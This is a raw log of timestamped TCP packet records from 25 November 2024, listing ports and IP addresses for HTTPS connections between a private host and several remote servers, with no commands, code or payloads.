Nov 25, 2024 11:34:09.268737078 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.268743038 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.271054029 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.271125078 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.271131039 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.271276951 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.272058010 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.272119045 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.272170067 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.272218943 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.272223949 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.286307096 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.289282084 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.289350986 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.290133953 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.291630030 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.291637897 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.293991089 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.294075966 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.294512987 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.294517994 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.294775963 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.294779062 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.301086903 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.301110983 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.301302910 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.301562071 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.301578999 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.302400112 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.302436113 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.302673101 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.302820921 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.302846909 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.357541084 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.360992908 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.361035109 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.361054897 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.361129045 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.361757994 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.361764908 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.361803055 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.361807108 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.363842010 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.366173029 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.366204977 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.366483927 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.366717100 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.366739035 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.366980076 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.367563009 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.367585897 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.367600918 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.367613077 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.367618084 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.369682074 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.369720936 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.369908094 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.370094061 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.370107889 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.640798092 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.641160965 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.641179085 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.642627001 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.642693996 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.643071890 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.643151999 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.643228054 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.682544947 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.682590008 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.682667017 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.683007002 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.683017969 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.687335968 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.696046114 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.696481943 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.696501017 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.696656942 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.696666956 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.696953058 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.697335005 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.697344065 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.697583914 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.697642088 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.697722912 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.697957039 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.698020935 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.698090076 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.698302031 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.698390961 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.698405981 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.702315092 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.702522039 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.702533960 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.703155994 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.703474045 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.703556061 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.703607082 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.704279900 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.704582930 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.704593897 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.705485106 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.705708027 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.705733061 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.706463099 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.706522942 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.706850052 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.706931114 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.707009077 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.709331036 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.709413052 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.709718943 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.709822893 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.709897995 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.728046894 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.728079081 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.728239059 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.728497028 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.729440928 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.729466915 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.739337921 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.739362001 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.742985010 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.742990971 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.742990017 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.742990971 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.747330904 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.747371912 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.758392096 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.758395910 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.758397102 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.758425951 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.758441925 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:09.771339893 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.786925077 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.802434921 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:09.802442074 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.058367968 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:10.058581114 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:10.058644056 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:10.059864998 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:10.059876919 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:10.079850912 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.079904079 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.079969883 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.079988003 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.081749916 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.081821918 CET	443	49933	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.082007885 CET	49933	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.082268000 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.082281113 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.082357883 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.082844019 CET	49949	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.082851887 CET	443	49949	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.144228935 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.144253016 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.144308090 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.144320011 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.144341946 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.144361973 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.144407034 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.144416094 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.145097971 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.145159960 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.145752907 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.145792961 CET	443	49935	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.145874977 CET	49935	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146131992 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146177053 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.146258116 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146532059 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146537066 CET	443	49934	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.146545887 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146579981 CET	49934	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146966934 CET	49950	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.146981001 CET	443	49950	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.147063971 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.150109053 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.150161982 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.150173903 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.150218010 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.153177023 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.153225899 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.153390884 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.153398037 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.153548956 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.153594971 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.153652906 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.153713942 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.153842926 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.153867960 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.154756069 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.154809952 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.155309916 CET	49936	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.155332088 CET	443	49936	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.157432079 CET	49932	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.157435894 CET	443	49932	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.157929897 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.157929897 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.157955885 CET	443	49937	13.107.246.40	192.168.2.5
Nov 25, 2024 11:34:10.158030033 CET	49937	443	192.168.2.5	13.107.246.40
Nov 25, 2024 11:34:10.321723938 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:10.321835995 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:10.323189020 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:10.323199987 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:10.325367928 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:10.325373888 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:10.842076063 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:10.842597961 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:10.842614889 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:10.843592882 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:10.843599081 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:10.843636036 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:10.843642950 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:10.999042034 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:10.999326944 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:10.999340057 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.000443935 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.000813007 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:11.000890017 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.006799936 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.007270098 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.007282972 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.007740974 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.007745981 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.023154020 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.023612976 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.023653984 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.024152040 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.024167061 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.030932903 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.031176090 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:11.031192064 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.031553984 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.032149076 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:11.032229900 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:11.054431915 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:11.072350025 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:11.082516909 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.082974911 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.082997084 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.083509922 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.083514929 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.102305889 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.102334023 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.102354050 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.102380991 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.102392912 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.102422953 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.102427959 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.102462053 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.102480888 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.154946089 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.154973030 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.155040026 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.155049086 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.155203104 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.162348032 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.162735939 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.162775040 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.163333893 CET	49944	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.163341045 CET	443	49944	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.208337069 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.209043026 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.209075928 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.209537029 CET	49943	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.209547997 CET	443	49943	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.313834906 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.313865900 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.313905001 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.313920975 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.313949108 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.313965082 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.349334955 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.349359989 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.349420071 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.349431992 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.349458933 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.349478006 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.373603106 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.373629093 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.373692989 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.373701096 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.373728991 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.373739004 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.397995949 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.398025036 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.398080111 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.398091078 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.398118019 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.398139954 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.450139999 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.453277111 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.453357935 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.453747988 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.453763962 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.453773975 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.453780890 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.456697941 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.459714890 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.459788084 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.465554953 CET	49941	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.465565920 CET	443	49941	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.476613045 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.476639986 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.476710081 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.477375984 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.477423906 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.477533102 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.477821112 CET	49951	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.477838039 CET	443	49951	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.478079081 CET	49952	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.478092909 CET	443	49952	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.526005030 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.529156923 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.529217958 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.529387951 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.529427052 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.529441118 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.529450893 CET	49942	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.529463053 CET	443	49942	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.531137943 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.531162977 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.531232119 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.531239986 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.531723976 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.532459021 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.532478094 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.532574892 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.532746077 CET	49953	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:11.532763004 CET	443	49953	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:11.549287081 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.549313068 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.549350977 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.549356937 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.549385071 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.549405098 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.567431927 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.567452908 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:11.567548990 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:11.567548990 CET	49938	443	192.168.2.5	49.13.32.95
